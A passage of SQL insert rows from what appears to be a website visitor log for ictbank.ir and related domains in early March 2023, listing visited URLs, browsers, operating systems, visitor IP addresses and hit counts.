(29399,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,1,0),
(29400,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','194.116.163.65','000',0,2,0),
(29401,'2023-02-28','https://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','194.116.162.219','000',0,2,0),
(29402,'2023-02-28','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','104.131.66.233','000',0,1,0),
(29403,'2023-02-28','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.236.193.183','000',0,1,0),
(29404,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.30.89.51','000',0,2,0),
(29405,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.224','000',0,1,0),
(29406,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.193','000',0,1,0),
(29407,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.184','000',0,1,0),
(29408,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','93.158.91.189','000',0,1,0),
(29409,'2023-03-01','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(29410,'2023-03-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(29411,'2023-03-01','https://ictbank.ir/blog','Chrome','Linux','63.0.0.0','desktop','Unknown','','202.0.112.207','000',0,4,0),
(29412,'2023-03-01','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(29413,'2023-03-01','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(29414,'2023-03-01','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,2,0),
(29415,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','18.233.156.159','000',0,1,0),
(29416,'2023-03-01','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,2,0),
(29417,'2023-03-01','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(29418,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(29419,'2023-03-01','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,4,0),
(29420,'2023-03-01','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,2,0),
(29421,'2023-03-01','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(29422,'2023-03-01','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(29423,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(29424,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,4,0),
(29425,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,3,0),
(29426,'2023-03-01','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(29427,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,1,0),
(29428,'2023-03-01','https://ictbank.ir/blog','Chrome','Android','85.0.0.0','mobile:smart','Redmi 4X','','178.208.67.34','000',0,2,0),
(29429,'2023-03-01','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.245.144','000',0,3,0),
(29430,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.200.54.128','000',0,1,0),
(29431,'2023-03-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','67.20.76.74','000',0,1,0),
(29432,'2023-03-01','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29433,'2023-03-01','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.90.156','000',0,1,0),
(29434,'2023-03-01','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.94.161','000',0,1,0),
(29435,'2023-03-01','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.254.25.10','000',0,1,0),
(29436,'2023-03-01','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','185.105.3.46','000',0,1,0),
(29437,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29438,'2023-03-01','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','202.77.48.139','000',0,1,0),
(29439,'2023-03-01','https://ictbank.ir/blog','Safari','OS X','5.0.0','desktop','Macintosh','','52.51.218.89','000',0,1,0),
(29440,'2023-03-01','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.225','000',0,1,0),
(29441,'2023-03-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','97.74.84.77','000',0,1,0),
(29442,'2023-03-01','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','14.63.221.211','000',0,1,0),
(29443,'2023-03-01','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(29444,'2023-03-01','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','79.0.0.0','desktop','Unknown','','185.119.81.103','000',0,2,0),
(29445,'2023-03-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.144.54','000',0,1,0),
(29446,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','101.34.223.139','000',0,3,0),
(29447,'2023-03-01','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29448,'2023-03-02','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(29449,'2023-03-02','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.3','000',0,3,0),
(29450,'2023-03-02','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29451,'2023-03-02','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','64.227.73.220','000',0,6,0),
(29452,'2023-03-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.130.144.144','000',0,1,0),
(29453,'2023-03-02','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','93.99.104.106','000',0,1,0),
(29454,'2023-03-02','https://ictbank.ir/blog','Firefox','Windows','56.0','desktop','Unknown','','85.17.54.26','000',0,1,0),
(29455,'2023-03-02','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.13','000',0,2,0),
(29456,'2023-03-02','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.93','000',0,1,0),
(29457,'2023-03-02','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.202','000',0,1,0),
(29458,'2023-03-02','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.15.21','000',0,1,0),
(29459,'2023-03-02','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.25.10','000',0,1,0),
(29460,'2023-03-02','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.161','000',0,1,0),
(29461,'2023-03-02','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.78.6','000',0,1,0),
(29462,'2023-03-02','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.85.182','000',0,1,0),
(29463,'2023-03-02','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.16.187','000',0,1,0),
(29464,'2023-03-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,4,0),
(29465,'2023-03-02','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,2,0),
(29466,'2023-03-02','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','79.99.200.27','000',0,3,0),
(29467,'2023-03-02','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.122','000',0,5,0),
(29468,'2023-03-02','http://www.google.com.hk','Chrome','Windows','42.0.0.0','desktop','Unknown','','209.141.51.44','000',0,1,0),
(29469,'2023-03-02','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,8,0),
(29470,'2023-03-02','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','65.109.224.171','000',0,4,0),
(29471,'2023-03-02','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','158.69.23.79','000',0,6,0),
(29472,'2023-03-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.212.197','000',0,1,0),
(29473,'2023-03-02','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.202.184.25','000',0,1,0),
(29474,'2023-03-02','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','84.0.0.0','desktop','Unknown','','185.119.81.97','000',0,4,0),
(29475,'2023-03-02','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.0.224','000',0,1,0),
(29476,'2023-03-02','https://45.92.94.221/blog','Chrome','Windows','77.0.0.0','desktop','Unknown','','104.248.155.200','000',0,4,0),
(29477,'2023-03-02','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(29478,'2023-03-02','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.38','000',0,1,0),
(29479,'2023-03-02','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.70','000',0,1,0),
(29480,'2023-03-02','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(29481,'2023-03-02','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','185.119.81.103','000',0,2,0),
(29482,'2023-03-02','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','36.255.221.148','000',0,2,0),
(29483,'2023-03-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.21.229','000',0,1,0),
(29484,'2023-03-02','https://ictbank.ir/blog','Chrome','Android','71.0.0.0','mobile:smart','2','','92.53.96.147','000',0,2,0),
(29485,'2023-03-02','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','81.93.142.130','000',0,1,0),
(29486,'2023-03-02','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.200.237.38','000',0,1,0),
(29487,'2023-03-02','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','104.236.3.52','000',0,2,0),
(29488,'2023-03-03','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.1.248.34','000',0,2,0),
(29489,'2023-03-03','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','194.87.151.73','000',0,4,0),
(29490,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,6,0),
(29491,'2023-03-03','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','37.59.42.94','000',0,1,0),
(29492,'2023-03-03','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.6.178','000',0,1,0),
(29493,'2023-03-03','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.193.162','000',0,1,0),
(29494,'2023-03-03','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.74.59','000',0,1,0),
(29495,'2023-03-03','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.15.21','000',0,1,0),
(29496,'2023-03-03','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,1,0),
(29497,'2023-03-03','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.28','000',0,1,0),
(29498,'2023-03-03','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,3,0),
(29499,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(29500,'2023-03-03','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(29501,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,2,0),
(29502,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.56','000',0,3,0),
(29503,'2023-03-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(29504,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','67.227.250.236','000',0,1,0),
(29505,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','194.135.86.113','000',0,1,0),
(29506,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','204.48.26.202','000',0,1,0),
(29507,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','132.148.165.98','000',0,1,0),
(29508,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','116.203.52.224','000',0,1,0),
(29509,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','182.50.132.25','000',0,1,0),
(29510,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','82.165.85.251','000',0,1,0),
(29511,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(29512,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','74.208.57.100','000',0,1,0),
(29513,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','138.197.161.71','000',0,1,0),
(29514,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','83.167.244.177','000',0,1,0),
(29515,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','107.180.108.2','000',0,1,0),
(29516,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.106.249.142','000',0,1,0),
(29517,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,3,0),
(29518,'2023-03-03','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','61.0.0.0','desktop','Unknown','','185.119.81.103','000',0,6,0),
(29519,'2023-03-03','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.51.198','000',0,1,0),
(29520,'2023-03-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,4,0),
(29521,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.59','000',0,1,0),
(29522,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(29523,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','171.13.14.75','000',0,1,0),
(29524,'2023-03-03','https://ictbank.ir/blog','Chrome','Android','106.0.0.0','mobile:smart','Nexus 5','','171.13.14.84','000',0,1,0),
(29525,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.144.154.205','000',0,1,0),
(29526,'2023-03-03','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.119.81.97','000',0,6,0),
(29527,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','40.0.0.0','desktop','Unknown','','79.124.59.150','000',0,3,0),
(29528,'2023-03-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(29529,'2023-03-03','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(29530,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.247.136','000',0,2,0),
(29531,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.33.113.146','000',0,1,0),
(29532,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(29533,'2023-03-03','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.212.12.190','000',0,1,0),
(29534,'2023-03-03','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','200.79.176.155','000',0,1,0),
(29535,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(29536,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','100.24.33.137','000',0,2,0),
(29537,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,3,0),
(29538,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.162.72.195','000',0,1,0),
(29539,'2023-03-03','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(29540,'2023-03-03','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,3,0),
(29541,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29542,'2023-03-03','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','43.130.154.223','000',0,1,0),
(29543,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','212.224.98.109','000',0,1,0),
(29544,'2023-03-03','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','74.0.0.0','desktop','Unknown','','185.119.81.106','000',0,2,0),
(29545,'2023-03-03','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','159.223.98.81','000',0,32,0),
(29546,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.171.180.165','000',0,1,0),
(29547,'2023-03-03','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','185.125.206.165','000',0,2,0),
(29548,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,2,0),
(29549,'2023-03-03','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','111.90.145.188','000',0,1,0),
(29550,'2023-03-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,2,0),
(29551,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,3,0),
(29552,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,1,0),
(29553,'2023-03-04','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.159','000',0,2,0),
(29554,'2023-03-04','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.15.21','000',0,1,0),
(29555,'2023-03-04','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.85.182','000',0,1,0),
(29556,'2023-03-04','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.14.232','000',0,1,0),
(29557,'2023-03-04','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.86.63','000',0,1,0),
(29558,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29559,'2023-03-04','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(29560,'2023-03-04','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(29561,'2023-03-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(29562,'2023-03-04','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(29563,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.21','000',0,4,0),
(29564,'2023-03-04','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','81.93.142.130','000',0,5,0),
(29565,'2023-03-04','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','37.59.53.82','000',0,1,0),
(29566,'2023-03-04','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','178.255.46.64','000',0,1,0),
(29567,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','204.48.26.148','000',0,2,0),
(29568,'2023-03-04','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','157.90.90.227','000',0,1,0),
(29569,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.190','000',0,2,0),
(29570,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.39','000',0,6,0),
(29571,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','79.124.59.150','000',0,3,0),
(29572,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(29573,'2023-03-04','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','71.0.0.0','desktop','Unknown','','185.119.81.106','000',0,6,0),
(29574,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.115.133','000',0,1,0),
(29575,'2023-03-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,12,0),
(29576,'2023-03-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(29577,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.41','000',0,1,0),
(29578,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.32','000',0,3,0),
(29579,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,2,0),
(29580,'2023-03-04','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(29581,'2023-03-04','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','37.139.53.17','000',0,7,0),
(29582,'2023-03-04','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','79.0.0.0','desktop','Unknown','','185.119.81.103','000',0,2,0),
(29583,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.118.180','000',0,1,0),
(29584,'2023-03-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.47','000',0,1,0),
(29585,'2023-03-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','82.165.87.80','000',0,1,0),
(29586,'2023-03-04','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','37.19.199.217','000',0,3,0),
(29587,'2023-03-04','https://www.google.com/search?','Chrome','iOS','107.0.0.0','mobile:smart','iPhone','','23.88.121.72','000',0,284,0),
(29588,'2023-03-04','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','45.79.73.219','000',0,3,0),
(29589,'2023-03-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.13.78','000',0,1,0),
(29590,'2023-03-04','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(29591,'2023-03-04','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','116.39.242.228','000',0,1,0),
(29592,'2023-03-05','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Vivaldi','Linux','5.0.0.0','desktop','Unknown','','37.139.53.17','000',0,3,0),
(29593,'2023-03-05','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.45','000',0,9,0),
(29594,'2023-03-05','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(29595,'2023-03-05','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','34.201.31.197','000',0,1,0),
(29596,'2023-03-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.185.4.69','000',0,1,0),
(29597,'2023-03-05','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(29598,'2023-03-05','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,1,0),
(29599,'2023-03-05','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.59','000',0,5,0),
(29600,'2023-03-05','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29601,'2023-03-05','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','56.0.0.0','desktop','Unknown','','185.119.81.97','000',0,2,0),
(29602,'2023-03-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.124.208.205','000',0,2,0),
(29603,'2023-03-05','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','217.218.196.207','000',0,87,0),
(29604,'2023-03-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29605,'2023-03-05','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.46','000',0,3,0),
(29606,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29607,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.214.116.24','000',0,1,0),
(29608,'2023-03-05','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.39','000',0,4,0),
(29609,'2023-03-05','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,14,0),
(29610,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','138.68.105.76','000',0,1,0),
(29611,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','207.154.214.131','000',0,1,0),
(29612,'2023-03-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(29613,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','35.0.0.0','desktop','Unknown','','79.124.59.150','000',0,9,0),
